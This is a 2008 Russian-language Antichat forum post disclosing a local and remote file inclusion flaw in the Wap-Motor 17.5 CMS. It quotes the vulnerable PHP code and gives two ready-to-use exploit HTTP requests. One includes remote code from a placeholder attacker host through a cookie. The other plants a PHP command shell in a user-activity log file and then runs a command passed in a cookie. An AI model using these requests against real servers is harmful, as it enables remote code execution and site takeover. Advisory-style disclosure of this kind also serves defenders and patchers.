ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Wap-Motor 17.5 LFI/RFI Vulnerability
  #1  
Старый 07.08.2008, 22:04
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию Wap-Motor 17.5 LFI/RFI Vulnerability

Сайт разработчика: http://visavi.net/
Уязвимые версии: Wap-Motor 17.5, возможно более ранние версии

Описание: сценарий index.php подключает необходимые скрипты, первый из которых (template/start.php) извлекает данные в текущую символьную таблицу, допуская перезапись переменных:
PHP код:
<?php
extract
($HTTP_GET_VARS);
extract($HTTP_POST_VARS);
extract($HTTP_COOKIE_VARS);
extract($HTTP_SERVER_VARS);
extract($HTTP_SESSION_VARS);
?>
На основе переменных $p и $f составляется строка, которая впоследствии передается в функцию include (index.php@48-56):
PHP код:
<?php
if(empty($f)){$f='index';}
echo 
$p.'/'.$f.'.'.$config_ras;
$sfx file($p.'/'.$f.'.'.$config_ras);
if (!
$sfx){
    echo 
'Файл с данными параметрами не найден!';
}else{
    include_once 
$p.'/'.$f.'.'.$config_ras;
}
?>
Система предполагает получение переменных $p и $f со стороны пользователя, однако проверка данных проводится только в массиве $_GET (index.php@23):
PHP код:
<?php
if(eregi("[^a-z0-9_-]",$_GET['f']) || eregi("[^a-z0-9_-]",$_GET['p'])){header ("Location: index.php?error&".SID); exit;}
?>
При передаче параметров p и f в cookie или в POST-запросе существует возможность обхода фильтрации и внедрения произвольных данных в функцию include.

RFI-эксплоит (для удачной эксплуатации на удаленном сервере необходимо создать файл s.mot с php-кодом, а также необходим allow_url_include=on):
GET /index.php HTTP/1.0
Host: localhost
Cookie: p=http://eViLhOsT; f=s;
Connection: close


LFI-эксплоит (нужна сессия пользователя, а также необходим magic_quotes_gpc=off):
GET /index.php/%3C%3Fphp+echo+%60%7B$_COOKIE%5B'c'%5D%7D%60%3B+%3 F%3E HTTP/1.0
Host: localhost
Cookie: p=local/who.dat%00; c=id; SID=qsm8nce7777k4tvkt0vfbiem41;
Connection: close


Несмотря на путь, будет запрошен скрипт index.php, и в файл local/who.dat, логирующий активность недавних пользователей, будет записан следующий код:
user|/index.php/<?php echo `{$_COOKIE['c']}`; ?>|11|1218131297|

При этом произойдет обращение к local/who.dat с параметром c, который содержит команду для выполнения.

Последний раз редактировалось [Raz0r]; 12.01.2009 в 19:27..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Wap сайты - раскрутка и оптимизация Solide Snake SЕО - тонкости, методы раскрутки 8 29.08.2008 02:11
Маленькие секреты wap мастера... inlanger Статьи 1 03.05.2008 13:41
Создание, продвижение и раскрутка wap сайта XENOT SЕО - тонкости, методы раскрутки 0 19.03.2008 03:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ